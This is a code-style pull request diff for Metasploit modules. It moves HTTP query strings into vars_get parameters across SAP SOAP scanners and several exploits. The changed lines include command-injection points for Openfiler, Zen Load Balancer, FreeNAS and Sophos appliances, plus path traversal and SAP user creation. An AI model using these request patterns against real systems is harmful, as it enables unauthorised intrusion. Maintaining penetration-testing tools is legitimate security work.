### PR TITLE
msftidy fixes - use vars_get

### DIFF
--- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
+++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
@@ -38,12 +38,12 @@ class Metasploit3 < Msf::Auxiliary
       begin
         print_status("Trying session ID #{x.to_s}")
 
-        res = send_request_raw({
-          'uri'       => "/cgi-bin/makecgi-pro",
+        res = send_request_cgi({
+          'uri'       => 'cgi-bin/makecgi-pro',
           'method'    => 'GET',
           'vars_get'  => {
-            'job' => 'show_home',
-            'session_id' => x.to_s
+            'job'         => 'show_home',
+            'session_id'  => x.to_s
           }
         }, 25)
 

--- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
+++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
@@ -39,8 +39,12 @@ class Metasploit3 < Msf::Auxiliary
         print_status("Trying session ID #{x.to_s}")
 
         res = send_request_raw({
-          'uri'     => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",
-          'method'  => 'GET'
+          'uri'       => "/cgi-bin/makecgi-pro",
+          'method'    => 'GET',
+          'vars_get'  => {
+            'job' => 'show_home',
+            'session_id' => x.to_s
+          }
         }, 25)
 
         if (res and res.to_s =~ /Log out/)

--- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb
+++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
     traverse = "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
     filename = datastore['FILEPATH']
 
-    res = send_request_raw({
+    res = send_request_cgi({
       'uri'       => '/scheduleresult.de/',
       'method'    => 'GET',
       'vars_get'  => {

--- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb
+++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb
@@ -50,8 +50,11 @@ class Metasploit3 < Msf::Auxiliary
     filename = datastore['FILEPATH']
 
     res = send_request_raw({
-      'uri' => "/scheduleresult.de/?FileName=#{traverse}#{filename}",
-      'method' => 'GET'
+      'uri'       => '/scheduleresult.de/',
+      'method'    => 'GET',
+      'vars_get'  => {
+        'FileName' => "#{traverse}#{filename}"
+      }
     }, 25)
 
     if res

--- a/modules/auxiliary/scanner/oracle/spy_sid.rb
+++ b/modules/auxiliary/scanner/oracle/spy_sid.rb
@@ -35,9 +35,13 @@ class Metasploit3 < Msf::Auxiliary
   def run_host(ip)
     begin
       res = send_request_raw({
-        'uri'     => '/servlet/Spy?format=raw&loginfo=true',
-        'method'  => 'GET',
-        'version' => '1.1',
+        'uri'       => '/servlet/Spy',
+        'method'    => 'GET',
+        'version'   => '1.1',
+        'vars_get'  => {
+          'format' => 'raw',
+          'loginfo' => 'true'
+        }
       }, 5)
 
       if res and res.body =~ /SERVICE_NAME=/

--- a/modules/auxiliary/scanner/oracle/spy_sid.rb
+++ b/modules/auxiliary/scanner/oracle/spy_sid.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def run_host(ip)
     begin
-      res = send_request_raw({
+      res = send_request_cgi({
         'uri'       => '/servlet/Spy',
         'method'    => 'GET',
         'version'   => '1.1',

--- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb
+++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb
@@ -96,12 +96,16 @@ class Metasploit4 < Msf::Auxiliary
     begin
       print_status("#{rhost}:#{rport} - Sending request for #{smb_uri}")
       res = send_request_raw({
-        'uri' => '/sap/bw/xml/soap/xmla?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
+        'uri'           => "/sap/bw/xml/soap/xmla",
+        'method'        => 'POST',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'data' => data,
-        'ctype' => 'text/xml; charset=UTF-8',
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT']
+        'data'          => data,
+        'ctype'         => 'text/xml; charset=UTF-8',
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
+        }
       })
       if res and res.code == 200 and res.body =~ /XML for Analysis Provider/ and res.body =~ /Request transfered is not a valid XML/
         print_good("#{rhost}:#{rport} - SMB Relay looks successful, check your SMB capture machine")

--- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb
+++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb
@@ -95,8 +95,8 @@ class Metasploit4 < Msf::Auxiliary
 
     begin
       print_status("#{rhost}:#{rport} - Sending request for #{smb_uri}")
-      res = send_request_raw({
-        'uri'           => "/sap/bw/xml/soap/xmla",
+      res = send_request_cgi({
+        'uri'           => '/sap/bw/xml/soap/xmla',
         'method'        => 'POST',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'data'          => data,

--- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
@@ -71,16 +71,19 @@ class Metasploit4 < Msf::Auxiliary
     begin
       print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>
-          {
+        'headers'       => {
             'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-          }
+        },
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
+        }
       })
       if res and res.code == 200
         if res.body =~ /<h1>Logon failed<\/h1>/

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
@@ -118,16 +118,19 @@ class Metasploit4 < Msf::Auxiliary
     data << '</env:Envelope>'
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
-        'ctype' => 'text/xml; charset=UTF-8',
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{client}",
+        'ctype'         => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(username, password),
-        'headers' =>
-          {
+        'headers'       => {
             'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-          }
+        },
+        'vars_get'      => {
+          'sap-client'    => client,
+          'sap-language'  => 'EN'
+        }
       })
       if res and res.code == 200
         report_auth_info(

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
@@ -93,14 +93,18 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers'       => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code != 500 and res.code != 200

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
@@ -94,14 +94,18 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers' => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb
@@ -72,18 +72,18 @@ class Metasploit4 < Msf::Auxiliary
     begin
       vprint_status("#{rhost}:#{rport} - Sending request to check #{datastore['DIR']}")
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc',
-        'method' => 'POST',
-        'data' => data,
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
-        'headers' => {
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
+        'headers'       => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
         },
-        'vars_get' => {
-          'sap-client' => datastore['CLIENT'],
-          'sap-language' => 'EN'
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code == 200 and res.body =~ /EPS_GET_DIRECTORY_LISTING\.Response/ and res.body =~ /<FILE_COUNTER>(\d*)<\/FILE_COUNTER>/

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb
@@ -74,18 +74,18 @@ class Metasploit4 < Msf::Auxiliary
     begin
       vprint_status("#{rhost}:#{rport} - Sending request to check #{datastore['FILEPATH']}")
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc',
-        'method' => 'POST',
-        'data' => data,
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
-        'headers' => {
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
+        'headers'       => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
         },
-        'vars_get' => {
-          'sap-client' => datastore['CLIENT'],
-          'sap-language' => 'EN'
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code == 200 and res.body =~ /PFL_CHECK_OS_FILE_EXISTENCE\.Response/

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb
@@ -62,17 +62,20 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
-        'method' => 'POST',
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
-        'data' => data,
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{client}",
+        'data'          => data,
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'ctype'  => 'text/xml; charset=UTF-8',
-        'headers' =>
-          {
-            'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
-          }
-        })
+        'ctype'         => 'text/xml; charset=UTF-8',
+        'headers'       => {
+          'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
+        },
+        'vars_get'      => {
+          'sap-client'    => client,
+          'sap-language'  => 'EN'
+        }
+      })
       if res and res.code != 500 and res.code != 200
         if res and res.body =~ /<h1>Logon failed<\/h1>/
           print_error("[SAP] #{ip}:#{rport} - login failed!")

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb
@@ -83,19 +83,23 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'ctype' => 'text/xml; charset=UTF-8',
-        'headers' =>{
+        'ctype'         => 'text/xml; charset=UTF-8',
+        'headers'       => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
           #'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
           #'Authorization' => 'Basic ' + user_pass,
           #'Content-Type' =>
-          }
-        })
+          },
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
+        }
+      })
       if res and res.code != 500 and res.code != 200
         # to do - implement error handlers for each status code, 404, 301, etc.
         if res.body =~ /<h1>Logon failed<\/h1>/

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb
@@ -96,18 +96,18 @@ class Metasploit4 < Msf::Auxiliary
     begin
       vprint_status("#{rhost}:#{rport} - Sending request to enumerate #{datastore['DIR']}")
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc',
-        'method' => 'POST',
-        'data' => data,
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
-        'headers' => {
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
+        'headers'       => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
         },
-        'vars_get' => {
-          'sap-client' => datastore['CLIENT'],
-          'sap-language' => 'EN'
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code == 200 and res.body =~ /rfc:RZL_READ_DIR_LOCAL.Response/

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
@@ -70,16 +70,19 @@ class Metasploit4 < Msf::Auxiliary
     begin
       vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers'  =>
-          {
-            'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
-          }
+        'headers'       => {
+          'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
+        },
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
+        }
         })
       if res and res.code == 200
         if res.body =~ /<h1>Logon failed<\/h1>/

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb
@@ -73,16 +73,20 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers'       => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-          }
-        })
+        },
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
+        }
+      })
       if res and res.code != 500 and res.code != 200
         # to do - implement error handlers for each status code, 404, 301, etc.
         print_error("[SAP] #{ip}:#{rport} - something went wrong!")

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
@@ -73,14 +73,18 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers'       => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code != 500 and res.code != 200

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
@@ -89,14 +89,18 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers'       => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get'      => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code != 500 and res.code != 200

--- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb
@@ -64,14 +64,18 @@ class Metasploit4 < Msf::Auxiliary
 
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-        'method' => 'POST',
-        'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-        'ctype' => 'text/xml; charset=UTF-8',
+        'uri'           => '/sap/bc/soap/rfc',
+        'method'        => 'POST',
+        'data'          => data,
+        'cookie'        => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
+        'ctype'         => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers'       => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get'      => {
+            'sap-client'    => datastore['CLIENT'],
+            'sap-language'  => 'EN'
         }
       })
       if res and res.code == 200

--- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb
+++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb
@@ -103,8 +103,12 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
     begin
       res = send_request_cgi({
-        'uri'    => "/admin/system.html?step=2&device=lo#{cmd}",
-        'cookie' => "usercookie=#{user}; passcookie=#{pass};",
+        'uri'       => '/admin/system.html',
+        'cookie'    => "usercookie=#{user}; passcookie=#{pass};",
+        'vars_get'  => {
+          'step'    => "2",
+          'device'  => "lo#{cmd}"
+        }
       }, 25)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       fail_with(Failure::Unknown, 'Connection failed')

--- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb
+++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb
@@ -98,11 +98,14 @@ class Metasploit3 < Msf::Exploit::Remote
        'password' => datastore['PASSWORD']
       }
 
-      print_status("Authenticating as " + datastore['USERNAME'])
+      print_status("Authenticating as #{datastore['USERNAME']}")
       login = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, '/index.php?c=login'),
-        'method' => 'POST',
-        'vars_post' => post
+        'uri'       => normalize_uri(target_uri.path, '/index.php'),
+        'method'    => 'POST',
+        'vars_post' => post,
+        'vars_get'  => {
+          'c' => "login"
+        }
       })
 
       if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
@@ -134,9 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
       print_status("Changing old password hash to notpassword")
       passchange = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
-        'method' => 'POST',
-        'vars_post' => post
+        'uri'       => normalize_uri(target_uri.path, '/index.php'),
+        'method'    => 'POST',
+        'vars_post' => post,
+        'vars_get'  => {
+          'c' => "change_password"
+        }
       })
 
       if !passchange or passchange.code != 200
@@ -166,9 +172,12 @@ class Metasploit3 < Msf::Exploit::Remote
       }
 
       login = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
-        'method' =>  'POST',
-        'vars_post' => post
+        'uri'       => normalize_uri(target_uri.path, 'index.php'),
+        'method'    =>  'POST',
+        'vars_post' => post,
+        'vars_get'  => {
+          'c' => "login"
+        }
       })
 
       if !login or login.code != 200 or login.body !~ /admin<\/a>/
@@ -192,9 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
       print_status("Sending payload")
       send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
-        'method' => 'POST',
+        'uri'       => normalize_uri(target_uri.path, 'index.php'),
+        'method'    => 'POST',
         'vars_post' => post,
+        'vars_get'  => {
+          'c' => "netinterface",
+        }
       })
   end
 end

--- a/modules/exploits/linux/http/zen_load_balancer_exec.rb
+++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb
@@ -96,11 +96,16 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
     begin
       res = send_request_cgi({
-        'uri'     => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",
-        'headers' =>
-          {
-            'Authorization' => "Basic #{auth}"
-          }
+        'uri'       => '/index.cgi',
+        'headers'   => {
+          'Authorization' => "Basic #{auth}"
+        },
+        'vars_get'  => {
+          'nlines'  => lines.to_s,
+          'action'  => 'See+logs',
+          'id'      => '2-2',
+          'filelog' => cmd
+        }
       }, 25)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       fail_with(Failure::Unreachable, 'Connection failed')

--- a/modules/exploits/multi/http/freenas_exec_raw.rb
+++ b/modules/exploits/multi/http/freenas_exec_raw.rb
@@ -55,11 +55,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("Sending exploit page '#{page}'")
 
-    res = send_request_raw(
+    res = send_request_cgi(
       {
         'uri'       => '/exec_raw.php',
         'vars_get'  => {
-          'cmd' => Rex::Text.uri_encode(sploit)
+          'cmd' => sploit
         }
       }, 10)
 

--- a/modules/exploits/multi/http/freenas_exec_raw.rb
+++ b/modules/exploits/multi/http/freenas_exec_raw.rb
@@ -57,7 +57,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_request_raw(
       {
-        'uri'	=> "/exec_raw.php?cmd=" + Rex::Text.uri_encode(sploit),
+        'uri'       => '/exec_raw.php',
+        'vars_get'  => {
+          'cmd' => Rex::Text.uri_encode(sploit)
+        }
       }, 10)
 
     if (res and res.code == 200)

--- a/modules/exploits/multi/http/hyperic_hq_script_console.rb
+++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb
@@ -63,13 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote
     @cookie = "JSESSIONID=#{Rex::Text.rand_text_hex(32)}"
 
     res = send_request_cgi({
-      'uri'       => normalize_uri(@uri.path, "j_spring_security_check?org.apache.catalina.filters.CSRF_NONCE="),
+      'uri'       => normalize_uri(@uri.path, 'j_spring_security_check'),
       'method'    => 'POST',
       'cookie'    => @cookie,
       'vars_post' => {
         'j_username' => Rex::Text.uri_encode(user, 'hex-normal'),
         'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'),
         'submit'     => 'Sign+in'
+      },
+      'vars_get'  => {
+        'org.apache.catalina.filters.CSRF_NONCE' => ''
       }
     })
 
@@ -81,8 +84,11 @@ class Metasploit3 < Msf::Exploit::Remote
   #
   def get_nonce
     res = send_request_cgi({
-      'uri' => normalize_uri(@uri.path, "mastheadAttach.do?typeId=10003"),
-      'cookie' => @cookie
+      'uri'       => normalize_uri(@uri.path, "mastheadAttach.do"),
+      'cookie'    => @cookie,
+      'vars_get'  => {
+        'typeId' => '10003'
+      }
     })
 
     if not res or res.code != 200
@@ -136,10 +142,13 @@ class Metasploit3 < Msf::Exploit::Remote
   def http_send_command(java)
     res = send_request_cgi({
       'method'    => 'POST',
-      'uri'       => normalize_uri(@uri.path, 'hqu/gconsole/console/execute.hqu?org.apache.catalina.filters.CSRF_NONCE=')+@nonce,
+      'uri'       => normalize_uri(@uri.path, 'hqu/gconsole/console/execute.hqu'),
       'cookie'    => @cookie,
       'vars_post' => {
         'code' => java # java_craft_runtime_exec(cmd)
+      },
+      'vars_get'  => {
+        'org.apache.catalina.filters.CSRF_NONCE' => @nonce
       }
     })
     if res and res.code == 200 and res.body =~ /Executed/

--- a/modules/exploits/multi/http/openfire_auth_bypass.rb
+++ b/modules/exploits/multi/http/openfire_auth_bypass.rb
@@ -181,15 +181,17 @@ class Metasploit3 < Msf::Exploit::Remote
     data << "\r\n--#{boundary}--"
 
     res = send_request_cgi({
-      'uri'     => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"),
-      'method'  => 'POST',
